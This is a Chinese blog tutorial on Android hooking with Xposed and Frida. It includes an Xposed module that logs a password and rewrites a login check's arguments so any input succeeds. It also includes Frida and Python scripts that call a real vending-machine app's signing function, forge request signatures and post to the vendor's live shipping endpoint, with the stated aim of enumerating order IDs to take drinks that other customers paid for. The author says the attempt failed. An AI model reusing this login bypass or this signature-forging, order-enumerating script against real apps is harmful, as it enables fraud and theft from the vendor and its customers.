文章《不同协议的数据抓包》中提到了android hook技术，前面的文章也从ble的协议到抓包到分析都讲解了，下一步我们来详细说说android的hook技术，并且用一个案例来讲解hook 后的利用

xposed框架

xposed，主页：https://repo.xposed.info/module/de.robv.android.xposed.installer

是个开源的框架，在github上有源码的，直接下载apk后安装激活就可以使用，很多地方有这方面的教程，针对不同的手机架构，有大牛做了针对性的修改。可以在论坛中进行搜索

通过替换/system/bin/app_process程序控制zygote进程，使得app_process在启动过程中会加载XposedBridge.jar这个jar包，从而完成对Zygote进程及其创建的Dalvik虚拟机的劫持。

Xposed在开机的时候完成对所有的Hook Function的劫持，在原Function执行的前后加上自定义代码

很多人将这个框架用在对android的私有化定制上面，其实在android安全测试方面这个框架提供了很大的便利，xposed主要是对方法的hook，在以往的重打包技术中，需要对smali代码的进行修改，修改起来比较麻烦。

利用xposed框架可以很容易的获取到android应用中的信息，比如加密私钥、salt值等等，不需要饭编译获取密钥转换算法、不需要了解密钥保存机制，直接hook函数，获取输入输出就可以。

原理

在Android系统中，应用程序进程都是由Zygote进程孵化出来的，而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例，每当它孵化一个新的应用程序进程时，都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去，从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。
Zygote进程在启动的过程中，除了会创建一个Dalvik虚拟机实例之外，还会将Java运行时库加载到进程中来，以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意，一个应用程序进程被Zygote进程孵化出来的时候，不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝，还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native（JNI）方法hookMethodNative，这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析，不得不说，作者对于android的机制和java的了解已经相当深入了。

简单实例

很简单的一个android登入代码：

public class MainActivity extends AppCompatActivity {

    private TextView accountView;
    private TextView passwdView;
    private Button loginBut;
    private Button quitBut;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        accountView = (TextView) findViewById(R.id.account);
        passwdView = (TextView) findViewById(R.id.pwd);

        loginBut = (Button) findViewById(R.id.login);
        quitBut = (Button) findViewById(R.id.quit);

        loginBut.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                String username = accountView.getText() + "";
                String password = passwdView.getText() + "";
                if(isCorrectInfo(username,password)){
                    Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();
                }
                else{
                    Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show();
                }
            }
        });
    }

    public boolean isCorrectInfo(String username, String password) {
        if(username.equals("admin") && password.equals("passwd")){
            return true;
        }
        else{
            return false;
        }
    }

}

很简单的就是判断下用户输入的用户名和密码是正确，这里做个简单的演示，将用户输入的用户名和密码信息hook出来不管正确与否

简单说下xposed模块的开发，首先需要的是导入api，具体的可以参考：http://github.com/rovo89/XposedBridge/wiki/Using-the-Xposed-Framework-API

在manifest中定义

<application android:label="xposed">
       <meta-data
           android:name="xposedmodule"
           android:value="true" />
       <meta-data
           android:name="xposeddescription"
           android:value="hook test" />
       <meta-data
           android:name="xposedminversion"
           android:value="82" />
   </application>

声明这个是xposed模块，名称为hook test 并且使用api版本号是82

下面创建运行时候的hook代码：

package com.example.xposed;

import java.util.List;

import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.callbacks.XC_LoadPackage;

import static de.robv.android.xposed.XposedHelpers.findAndHookMethod;

public class Main implements IXposedHookLoadPackage {
    // 包加载的时候回调
    public void handleLoadPackage(final XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
        //过滤掉不是com.example.logintest的应用
        if (!lpparam.packageName.equals("com.example.logintest"))
            return;
        XposedBridge.log("加载应用:" + lpparam.packageName);

        // Hook MainActivity 中的判断方法
        findAndHookMethod("com.example.logintest.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,String.class new XC_MethodHook() {
            @Override
            protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                super.beforeHookedMethod(param);
                // XposedBridge.log("开始劫持~~~~");
                // XposedBridge.log("参数1:" + param.args[0]);
               XposedBridge.log("参数2:" + param.args[1]);
               XposedBridge.log("修改登入数据~~~~");// 修改为正确的用户名密码
               param.args[0]="admin";
               param.args[1]="passwd";
            }

            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {
//                super.afterHookedMethod(param);
                XposedBridge.log("劫持结束~~~~");
//                XposedBridge.log("参数1:" + param.args[0]);
//                XposedBridge.log("参数2:" + param.args[1]);
            }
        });
    }

}

看代码中的注释，主要是三个方法的调用，handleLoadPackage，主要是获取到android包的相关信息，这里由于只是对logintest进行hook,做下简单的判断。

findAndHookMethod 是主要的hook入口，里面几个参数分别为包名，classloader，hook的函数名，参数类型（这个比较容易出错，比如list类型写为List.class）,回调函数

回调函数中比较重要的：beforeHookedMethod和afterHookedMethod，一个是在函数运行前劫持掉，一个是hook后放行，实例中对用户输入的字段进行劫持打印，后面将参数之改为正确登入用户名和密码，这样在app中输入任何字符都能登入成功

frida Hook框架

Frida是一款基于python + javascript 的hook框架，通杀android\ios\linux\win\osx等各平台，由于是基于脚本的交互，因此相比xposed和substrace cydia更加便捷，本文重点介绍Frida在android下面的使用。

Frida的官网为：https://frida.re/

安装Frida非常简单，在pc端直接执行

pip install frida

即可

在Android设备需要导入frida的服务端，需要root你的手机

$ curl -O http://build.frida.re/frida/android/arm/bin/frida-server
$ chmod+x frida-server
$ adb push frida-server /data/local/tmp/

运行

设备上运行frida-server:

$ adb shell
root@android:/ chmod 700 frida-server
$ adb shell
root@android:/ /data/local/tmp/frida-server -t 0 (注意在root下运行)

电脑上运行adb forward tcp转发:

adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043

27042端口用于与frida-server通信,之后的每个端口对应每个注入的进程.

运行如下命令验证是否成功安装:

$ frida-ps-R

正常情况应该输出进程列表如下:

PID NAME
 1590 com.facebook.katana
13194 com.facebook.katana:providers
12326 com.facebook.orca
13282 com.twitter.android
…

Hook模块的编写

hook的主要模块是js编写的，利用javascript的api与server进行通信

下面结合一个真实例子进行简单的介绍：

这里我们分析的app是友宝，这是一款饮料售货机，当时抓包看到提货的时候是只有个订单id的，猜想是不是遍历订单的id，支付成功但是没有取货的订单会不会响应请求，自己掉货出来

下面对友宝的订单进行分析过程

抓取订单链接：

http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4

postdata：sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588

sign是校验值，主要是防止订单伪造的，orderid是产生的支付订单id，这个主要是防止伪造用

• 反编译友宝app

找到morder/shipping所在的包为：com/ub/main/d/e.class

其中localStringBuffer存储的就是url中的参数信息，该请求查找到的代码在a()

生成签名的函数在com/ub/main/d/e.class中的b函数

最后加上sign值，发送请求

可以反编译出他的sign计算方法，也可以直接调用b函数来产生sign值，后来发现app会自动取时间戳，我们就不需要给他array型的参数

直接调用a函数，把orderId给他，让他直接return一个值出来就好了，就有了的js代码

var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use("com.ub.main.d.e");# 调用com.ub.main.d.e类
var signInstance=signclass.$new(context); # 反射创建一个新的对象
var sign=signInstance.a("255601452"); #调用对象的a函数
send(sign); #将调用函数的结果发送出来

对于订单的连接进行下测试，看出现的sign值是否一致，可以将js和python脚本组合到一起：

# -*- coding:utf-8 -*-
import frida, sys #引入frida类
import logging

logging.basicConfig(filename='test.log', level=logging.INFO)

reload(sys)
sys.setdefaultencoding('utf-8') #对输出进行utf8的编码
print sys.getdefaultencoding()

def print_result(message): #对输出的信息进行打印
    print message
    logging.info(message)

def on_message(message, data): # 反调函数，用来接受message的信息，message后面会说到
    try:
        print_result(message=message)
    except:
        pass

did = "255601452" # 订单id
time = "1472706588" # 时间戳

jscode = """ # 核心代码，这段主要是调用app中的相应处理函数，后面会分析这段代码的来源

Dalvik.perform(function () { # 说明是Dalvik平台
    var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
    var context = currentApplication.getApplicationContext();
    var signclass = Dalvik.use("com.ub.main.d.e");# 调用com.ub.main.d.e类
    var signInstance=signclass.$new(context); # 反射创建一个新的对象
    var sign=signInstance.a("255601452"); #调用对象的a函数
    send(sign); #将调用函数的结果发送出来
});
"""
#print jscode

process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # 获取连接的设备并枚举取最后一个设备连接，并附到com.ub.main的进程上面

print process

script = process.create_script(jscode) # 调用相应的js函数，获取函数调用后的结果值
script.on('message', on_message) # 利用回调，将message传递给on_message函数
print "done"
script.load()

对于上面的代码，调用app中的某个函数，比如sign值生成函数，加密解密函数，不需要自己单独地去分析算法流程，分析key值在哪，直接调用app的相应函数，让app帮我们完成这些工作

• 自动化的批量处理

这里是不是可以遍历所有的订单号，然后调用上面的签名批量遍历结果去请求。只要别人买了饮料没有取的话，遍历到他的订单就可以请求服务器说我来取饮料了，这样触发吐货请求？

看代码

# __author__ = 'adrain'
# -*- coding:utf-8 -*-
import frida, sys
import logging
import requests

logging.basicConfig(filename='test.log', level=logging.INFO)

reload(sys)
sys.setdefaultencoding('utf-8')

# print sys.getdefaultencoding()

class ubox:
    def __init__(self):
        pass

    def request(self, payload):
        # print "requests"
        dict = {}
        url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"
        for i in payload.split("&"):
            key = i.split("=")[0]
            value = i.split("=")[1]
            dict[key] = value

        data=dict

        r=requests.post(url=url,data=data)

        print r.text

    def print_result(self, message):
        # print message
        payload = message["payload"]
        print payload
        self.request(payload)

    def on_message(self, message, data):
        self.print_result(message=message)

    def fuzzing(self, did):
        jscode = """
        Dalvik.perform(function () {
        var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();
        var context = currentApplication.getApplicationContext();
        var signclass = Dalvik.use("com.ub.main.d.e");
        var signInstance=signclass.$new(context);
        var sign=signInstance.a("%s");
        send(sign);
        });
        """ % did
        # print jscode
        process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")
        # print process
        script = process.create_script(jscode)
        script.on('message', self.on_message)
        # print "done"
        script.load()
        # sys.stdin.read()

ub = ubox()
ub.fuzzing("255912964")

构造了一个类，后面直接fuzz uid就可以了，提取里面的sign值拼接到post数据中去

可以产生的post请求和抓到的数据包的请求是完全一样的，但是并没有测试成功，分析原因有可能是订单id和用户的id有所绑定。

不过学习到了怎样通过frida对app进行分析。

复杂参数的hook

如果遇到函数的参数类型是数组、map、ArrayList类型的，首先目标MyClass类的fun1函数，声明如下：

public static boolean fun1(String[][] strAry, Map mp1, Map<String,String> mp2, Map<Integer, String> mp3,
                      ArrayList<String> al1, ArrayList<Integer> al2, ArgClass ac)

解决方法：

用Xposed自身提供的XposedHelpers的findClass方法加载每一个类，然后再将得到的类传递给hook函数作参数！

参考链接：

http://bbs.pediy.com/showthread.php%3Ft%3D202147%26page%3D2

http://www.freebuf.com/articles/terminal/56453.html